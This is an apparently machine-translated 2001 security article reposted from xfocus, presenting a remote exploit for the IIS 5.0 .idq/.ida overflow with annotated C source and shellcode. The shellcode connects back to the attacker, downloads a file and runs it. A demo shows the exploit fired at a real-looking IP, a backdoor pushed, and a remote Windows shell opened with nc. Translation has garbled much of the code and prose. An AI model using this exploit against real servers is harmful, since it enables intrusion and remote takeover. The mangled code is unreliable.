[Analysis] Analysis of the .idq.ida overflow attack

xiaoxiao2021-03-06 55

Analysis of the .idq / .ida overflow attack

Create time: 2001-07-01

Article attribute: original

Article Source:

http://www.xfocus.org

Article submission:

ISNO (isno_at_sina.com)

Analysis of the .idq / .ida overflow attack

ISNO (isno@xfocus.org)

The overflow vulnerability of IIS .idq / .ida has been published for a long time, but because of this vulnerability

Amazing difficulty, the available attack procedures have always been out of date. Even discovering this vulnerability

EEYE has not made an attack program, since the content sent into a wide character, it is covered.

The overflow address is more difficult to control, according to the EEYE method, it is a lot of NOP in front of Shellcode.

Take the shellcode to the address of 0x004x00xx, you can cover RET with a string such as XX4X.

A string is extended to the position of the shellcode after the XX004x00 is extended. This method is theoretical

Tong, but actually problems, you can control jump but you can't execute code, and different machines

This 0x004x00xx is different, which is difficult to make EXPLOIT.

Yesterday, I finally saw that the available attack procedure was published. I didn't carefully see it at the beginning I was a deception. Rear

Come with Softice, and ask Yuan Ge to understand. This exploit is very good,

Use a clever way to avoid the wide character, can control the jump address at will, using his method

Overwrite more complete EXPLOIT.

The shellcode of this program is relatively simple, just connects to the specified port of the specified host to accept

According to, then save it as aa.exe, then run aa.exe. But it and the previous deal. Htr overflow

IISHACK is different, it can't actively request data, but only wait for the host to send data, so

You can't use it to download the specified program, but must be sent by the attack-end attack program to wait

Data to the attacked host.

I changed this program so that it can attack Chinese version IIS5. Because I have to test a few days

Try, I don't have time to write a new program, only after the test is finished. Below is my improvement

The .idq Exploit program made some detailed annotations:

------------------------------- iDQ.c -------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------

/ *

IIS5.0 .idq overrun remote exploit

Programmed by hsj: 01.06.21

Code Flow:

Overrun -> JMP or Call EBX -> JMP 8 ->

Check shellcode addr and jump to there ->

Shellcode -> Make Back Channel -> Download & EXEC CODE

* /

/ *

Modified by isno

The Chinese version of Win2K IIS 5.0 SP0 attack is successful!

Compile in redhat6.2

* /

#include

#include #include

#include

#define ret 0x77e4ac97 / * jmp or call ebx * /

/ * This is the address of JMP EBX in Chinese version of Win2K (no SP) * /

#define GmHandlea 0x77E756DB / * Address of getModuleHandlea * /

#define gpaddress 0x77e7564b / * address of getprocaddress * /

/ * Chinese version of the address of getModuleHandlea and getProcaddress * /

/ * The address of these two API is fixed, so universal, actually use shellcode to search * /

#define gmhandlea_offset 24

/ * Offset location in GetModuleHandlea in Shellcode * /

#define gpaddress_offset 61

/ * 同同 * /

#define offset 234 / * Exception Handler Offset * /

/ *

The author chooses to cover SEH, which avoids overwriting the mistakes caused by certain ginseng,

But according to my test, it is also the same.

* /

#define nop 0x41

#define masking 1

#if masking

#define portmask 0x4141

#define addrmask 0x41414141

#define portmask_offset 128

#define addrmask_offset 133

#ENDIF

/ * Made some encodings, so as not to free the address or port, there is / 0 bytes in the port, and the shellcode * /

#define port 555

/ * SHELLCODE to connect to the port, do not use 80, because 80 is generally occupied * /

#define addr "111.111.111.111"

/ *

! ! ! Note: The above place is where you have to change! ! !

This is the host address you launched an attack, which is the host you run the attack program.

* /

#define port_offset 115

#define addr_offset 120

/ * Is some offset * /

Unsigned char shellcode [] =

"/ x5b / x33 / xc1 / x40 / x09 / x2b / xe0 / x33 / xc9 / x41 / x41 / x33 / xc0"

"/ x51 / x53 / x88 / x03 / x06 / x88 / x03 / xb8 / xdd / xcc / xbb / xaa / xff / xd0 / x59 / x50"

"/ X43 / XE2 / XEB / X33 / XED / X8B / XF3 / X5F / X33 / XC0 / X80 / X3B / X2E / X75 / X1E / X88"

"/ x03 / x83 / x04 / x8b / x7c / x24 / x10 / x56 / x57 / xb8 / xdd / xcc / xbb"

"/ XAA / XD / XD0 / X01 / X45 / X83 / XFD / X08 / X74 / X03 / X43 / XEB / XD8"

"/ x8d / x74 / x24 / x20 / x33 / xc0 / x50 / x40 / x50 / x40 / x50 / x8b / x46 / xfc / xff / xd0" "/ x8b / xf8 / x33 / xc0 / x40 / x40 / x66 / X89 / X06 / XC1 / XE0 / X03 / X50 / X56 / X57 / X66 "

"/ xc7 / x46 / x02 / xbb / xaa / xc7 / x46 / x04 / x44 / x33 / x22 / x11"

#if masking

"/ X66 / X81 / X76 / X02 / X41 / X41 / X81 / X76 / X04 / X41 / X41 / X41 / X41"

#ENDIF

"/ x8b / x46 / xf8 / xff / xd0 / x33 / xc0"

"/ xc7 / x06 / x2e / xc7 / x46 / x04 / x65 / x78 / x65 / x41 / x88 / x46 / x07"

"/ x66 / xb8 / x80 / x01 / x50 / x66 / xb8 / x01 / x81 / x50 / x56 / x8b / x46 / xec / xff / xd0"

"/ x8b / xd8 / x33 / xc1 / x50 / x09 / x50 / x8d / x4e / x08 / x51 / x57 / x8b"

"/ X46 / XF4 / XFF / XD0 / X85 / XC0 / X7E / X0E / X50 / X8D / X4E / X08 / X51 / X53 / X8B / X46"

"/ XE8 / XDC / XD0 / X90 / XEB / XDC / X53 / X8B / X46 / XE4 / XFF / XD0 / X57 / X8B / X46 / XF0"

"/ XFF / XD0 / X33 / XC0 / X50 / X56 / X56 / X8B / X46 / XE0 / XFF / XD0 / X33 / XC0 / XFF / XD0";

/ * SHELLCODE implements the function of connecting to the attack and downloading the program, this program must be on the attack terminal host * /

Unsigned char storage [] =

"/ Xeb / X02"

"/ xeb / x4e"

"/ Xe8 / XF9 / XFF / XFF / XFF"

"msvcrt.ws2_32.socket.connect.recv.closesocket."

"_open._write._close._execl.";

/ * This is the front shellcode used to jump to the back and addressing strings * /

Unsigned char forwardjump [] =

"% u08eb";

/ * This is a JMP 08H that covers an abnormal structure, used to jump to the code of shellcode's back to SHELLCODE * /

/ *

The author adds a% U symbol in front, so it can be exempted from the extended bright character, this method

Too wonderful! As for IIS to process% u, see bbs.nsfocus.com, Yuan Ge, disassembly

Code. The rear return address and the code that jumps shellcode have also processed.

* /

Unsigned char jump_to_shell [] =

"% UC033% UB866% U031F% U0340% U8BD8% U8B03"

"% U6840% UDB33% U30B3% UC303% UE0FF";

/ *

Jump to shellcode, I explain it in not, if you are interested, you can see yourself.

Note that every two bytes are reversed, the% UC033 becomes / x33 / xc0 after the conversion.

* /

Unsigned int resolve (char * name)

{

Struct hostent * he;

UNSIGNED INT IP;

IF ((ip = inet_addr (name)) == (- 1))

{

IF ((He = gethostByname (Name)) == 0)

Return 0;

Memcpy (& IP, He-> H_ADDR, 4);

Return IP;

}

/ * Domain name -> ip * /

Int make_connection (char * address, int port)

{

Struct SockAddr_in Server, Target;

INT S, I, BF;

FD_SET WD;

Struct TimeVal TV;

S = Socket (AF_INET, SOCK_STREAM, 0);

IF (s <0)

Return -1;

MEMSET ((Char *) & Server, 0, SIZEOF (Server);

Server.sin_family = af_INet;

Server.sin_addr.s_addr = HTONL (INADDR_Any);

Server.sin_Port = 0;

Target.sin_family = AF_INET;

Target.sin_addr.s_addr = resolve (address);

IF (target.sin_addr.s_addr == 0)

{

Close (s);

Return -2;

}

Target.sin_port = htons (port);

BF = 1;

IOCTL (S, Fionbio, & bF);

TV.tv_sec = 10;

TV.TV_USEC = 0;

FD_ZERO (& WD);

FD_SET (S, & WD);

Connect (S, Struct SockAddr *) & Target, Sizeof (Target);

IF ((i = SELECT (S 1, 0, & WD, 0, & TV)) == (- 1))

{

Close (s);

Return -3;

}

IF (i == 0)

{

Close (s);

Return-4;

}

i = sizeof (int);

GetSockopt (S, SOL_Socket, SO_ERROR, & BF, & I);

IF ((bf! = 0) || (i! = sizeof (int))))))

{

Close (s);

Errno = BF;

Return -5;

}

IOCTL (S, Fionbio, & bf);

Return S;

}

/ * The above is a function of connecting the host * /

/ *

Below this function is important, it monitors the port defined in front, I used 555,

Once there is a host connection, then the process will send a local program in the past.

This procedure is of course specified at runtime.

* /

INT GET_CONNECTION (INT Port)

{

Struct sockaddr_in local, remote;

Int lsock, csock, len, reuse_addr;

Lsock = Socket (AF_INET, SOCK_STREAM, 0);

IF (LSOCK <0)

{

PERROR ("socket");

Exit (1);

}

REUSE_ADDR = 1;

IF (setsockopt (lsock, sol_socket, so_reuseaddr, (char *) & reuse_addr, sizeof (reuse_addr)) <0)

{

PERROR ("setsockopt");

Close (LSOCK);

Exit (1);

}

MEMSET ((char *) & local, 0, sizeof (local);

Local.sin_family = af_INet;

Local.sin_port = htons (port); local.sin_addr.s_addr = HTONL (INADDR_Any);

IF (Bind (Struct SockAddr *) & local, sizeof (local)) <0)

{

PERROR ("bind");

Close (LSOCK);

Exit (1);

}

IF (Listent, 1) <0)

{

PERROR ("listen");

Close (LSOCK);

Exit (1);

}

Retry:

Len = SizeOf (remote);

Csock = Accept (LSOCK, (Struct SockAddr *) & Remote, & Len;

IF (CSOCK <0)

{

IF (errno! = EINTR)

{

PERROR ("accept");

Close (LSOCK);

Exit (1);

}

Else

Goto Retry;

}

Close (LSOCK);

Return Csock;

}

Int main (int Argc, char * argv [])

{

INT I, J, S, PID;

Unsigned int CB;

UNSIGNED SHORT Port;

Char * P, BUF [512], BUF2 [512], BUF3 [2048];

File * fp;

IF (argc! = 3)

{

Printf ("USAGE: $% s IP file / n", argv [0]);

Return -1;

}

IF ((fp = fopen (argv [2], "rb")) == 0)

Return -2;

IF (! (cb = resolve (add)))))

Return -3;

IF ((pID = fork ()) <0)

Return-4;

/ *

Open two processes for constructing and sending shellcode,

Another listening to the specified port and waits to send data.

* /

IF (PID)

{

Fclose (fp);

S = Make_Connection (Argv [1], 80);

IF (s <0)

{

Printf ("Connect Error: [% D] ./ n", s);

Kill (PID, SIGTERM);

Return -5;

}

J = Strlen (shellcode);

* (unsigned int *) & shellcode [gmhandlea_offset] = gmhandlea;

* (unsigned int *) & shellcode [gpaddress_offset] = gpAddress;

Port = HTONS (port);

#if masking

Port ^ = portmask;

CB ^ = addrmask;

* (unsigned short *) & shellcode [portmask_offset] = portmask;

* (unsigned int *) & shellcode [addrmask_offset] = addrmask;

#ENDIF

* (unsigned short *) & shellcode [port_offset] = port;

* (unsigned int *) & shellcode [addr_offset] = CB;

For (i = 0; i

{

IF ((shellcode [i] == 0x0a) ||

(Shellcode [i] == 0x0D) || (Shellcode [i] == 0x3a))

Break;

}

IF (i! = j)

{

Printf ("Bad Portno Or IP Address ... / N");

Close (s);

Kill (PID, SIGTERM);

Return-6;

}

MEMSET (BUF, 1, SIZEOF (BUF));

P = & buf [offset-2];

Sprintf (p, "% s", forwardjump);

P = strlen (forwardjump);

* p = 1;

* p = '%';

* p = 'u';

Sprintf (p, "% 04x", (re >> 0) & 0xfff);

P = 4;

* p = '%';

* p = 'u';

Sprintf (p, "% 04x", (re >> 16) & 0xfff);

P = 4;

* p = 1;

Sprintf (p, "% s", jump_to_shell);

MEMSET (BUF2, NOP, SIZEOF (BUF2));

Memcpy (& Buf2 [Sizeof (buf2) -strlen (shellcode) -Strlen (Storage) -1], Storage, Strlen (Storage));

Memcpy (& BUF2 [Sizeof (buf2) -strlen (shellcode) -1], shellcode, strlen (shellcode);

BUF2 [SIZEOF (BUF2) -1] = 0;

Sprintf (BUF3, "Get /a.idq?%S=A HTTP / 1.0 / R / NSHELL:% S / R / N / R / N", BUF, BUF2);

/ *

The above is constructing a spill string, and the spilled string is expanded and copied into the stack of IIS as follows:

.............. | Abnormal chain | Processing pointer | .................

010001000100 ..... | EB080100 | 97ACE477 | 010033c0 .........

| JMP 08H | JMP EBX | JMP shellcode

* /

Write (S, BUF3, Strlen (BUF3));

Printf ("---");

For (i = 0; i

{

IF ((i% 16) == 0)

Printf ("/ n");

Printf ("% 02x", BUF3 [I] & 0xFF);

}

Printf ("/ n --- / n");

Wait (0);

Sleep (1);

Shutdown (s, 2);

Close (s);

Printf ("DONE./N");

}

/ * Below this process is used to establish a connection, and open the specified file and send it out * /

Else

{

S = GET_CONNECTION (Port);

J = 0;

While ((i = fread (buf, 1, sizeof (buf), fp))))

{

Write (S, BUF, I);

J = I;

PRINTF (".");

Fflush (stdout);

}

Fclose (fp);

Printf ("/ N% D Bytes Send ... / n", J); Shutdown (S, 2);

Close (s);

}

Return 0;

}

------------------------- iDQ.c ----- Cut Here --------------- ----------------

The process of the entire program attack is like this:

Attack end is attacked

Send shellcode

--------------->

2. Overflow and run shellcode

3. Monitor 555 port waiting for connection

4. Connect to the attack end 555 port

<-------------------

5. Send file data

-------------------->

6 Accept the document as aa.exe and execute

Below is an example of demonstrating a specific usage:

First come to a Linux host to compile IDQ.c. gcc -o idq idq.c

! ! ! Note must first change the #define addr "111.111.111.111" in the program.

Linux host's IP address! ! !

Then upload a ncx99.exe to this host in the same directory:

Bash # ls -al

Total 90

DRWXRWXRWT 7 root root 1024 AUG 30 05:25.

DRWXR-XR-X 17 root root 1024 aug 28 15:47..

DRWXRWXRWT 2 XFS XFS 1024 May 14 03:03 .font-UNIX

-RWXR-XR-x 1 root root 18526 AUG 30 05:25 IDQ

-rw-r - r - 1 root root 8149 aug 30 05:25 idq.c

-rw-rw-rw- 1 root root 59392 AUG 17 1999 NCX99.EXE

It is assumed that you want to attack 61.135.19.222, it is:

Bash # ./idq 61.135.19.222 ncx99.exe

---

47 45 54 20 2F 61 2e 69 64 71 3F 01 01 01 01 01

01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01

01 01 01 01 01 01 01 01 01 01 0101 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01

01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01

01 01 01 25 75 30 38 65 62 01 25 75 61 63 39 37

25 75 37 37 65 34 01 25 75 43 30 33 33 25 75 42

38 36 36 25 75 30 33 31 46 25 75 30 33 34 30 25

75 38 42 44 38 25 75 38 42 30 33 25 75 36 38 34

30 25 75 44 42 33 33 25 75 33 30 42 33 25 75 43

33 30 33 25 75 45 30 46 46 3D 61 20 48 54 54 50

2F 31 2E 30 0D 0A 53 68 65 6C 6C 3A 20 41 41 41

41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41

41 41 41 41 41 41 41 41 41 41 EB 02 EB 4E E8 F9

FF FF FF 6D 73 76 63 72 74 2E 77 73 32 5F 33 32

2E 73 6F 63 6B 65 74 2e 63 6F 6e 6e 65 63 74 2E

72 65 63 76 2E 63 6C 6F 73 65 73 6F 63 6B 65 74

2E 5F 6F 70 65 6e 2e 5F 77 72 69 74 65 2E 5F 63

6C 6F 73 65 2E 5F 65 78 65 63 6C 2E 5B 33 C0 40

40 C1 E0 09 2B E0 33 C9 41 41 33 C0 51 53 83 C3

06 88 03 B8 DB 56 E7 77 FF D0 59 50 43 E2 EB 33

ED 8B F3 5F 33 C0 80 3B 2e 75 1e 88 03 83 FD 04

75 04 8B 7C 24 10 56 57 B8 4B 56 E7 77 FF D0 50

8D 73 01 45 83 FD 08 74 03 43 EB D8 8D 74 24 20

33 C0 50 40 50 40 50 8B 46 FC FF D0 8B F8 33 C0

40 40 66 89 06 C1 E0 03 50 56 57 66 C7 46 02 436A C7 46 04 8B 2D 63 51 66 81 76 02 41 41 81 76

04 41 41 41 41 8B 46 F8 FF D0 33 C0 C7 06 5C 61

61 2E C7 46 04 65 78 65 41 88 46 07 66 B8 80 01

50 66 B8 01 81 50 56 8B 46 EC FF D0 8B D8 33 C0

50 40 C1 E0 09 50 8D 4E 08 51 57 8B 46 F4 FF D0

85 C0 7e 0e 50 8D 4E 08 51 53 8B 46 E8 FF D0 90

EB DC 53 8B 46 E4 FF D0 57 8B 46 F0 FF D0 33 C0

50 56 56 8B 46 E0 FF D0 33 C0 FF D0 0D 0A 0D 0A

---

................................................ .............................

..................................

59392 BYTES Send ...

DONE.

Then the file has passed over and run, wait a few seconds, then you can connect it!

Bash # nc -vv 61.135.19.222 99

61.135.19.222: Inverse Host Lookup Failed: Unknown Host

(UNKNOWN) [61.135.19.222] 99 (?) Open

Microsoft Windows 2000 [Version 5.00.2195]

C: / WinNT / System32> CD /

CD /

C: /> DIR

DIR

The volume in the drive C does not have a label.

The serial number of the volume is CC31-6B3C

C: / directory

1997-01-11 16:54 297 1.pl

2001-07-01 03:08 59,392 aa.exe

1997-01-06 16:44

Documents and Settings

2001-06-30 16:21

Downloadload

2001-05-02 19:17

inetpub

2001-05-21 16:35

MP3

2001-05-02 21:48

mysql

2001-05-02 21:45

perl

2001-05-02 21:57

PHP

2001-06-30 16:24

Program Files

2001-06-22 01:47

Tool

2001-06-30 16:23

Winnt

.........

28 files 383,912 bytes

13 catalog 353, 680, 384 available bytes

C: /> EXIT

SENT 13, RCVD 2326

Bash #

You can also pass on the Glacial Server side, just you!

I feel a little lost, because the vulnerability is not what I found, the attack program is not what I wrote, I can only follow the hands of the masters, oh ... I also need to study again.

Welcome to visit

http://www.xfocus.org

Please keep your article intact!

转载请注明原文地址:https://www.9cbs.com/read-40856.html

9cbs

New Post(0)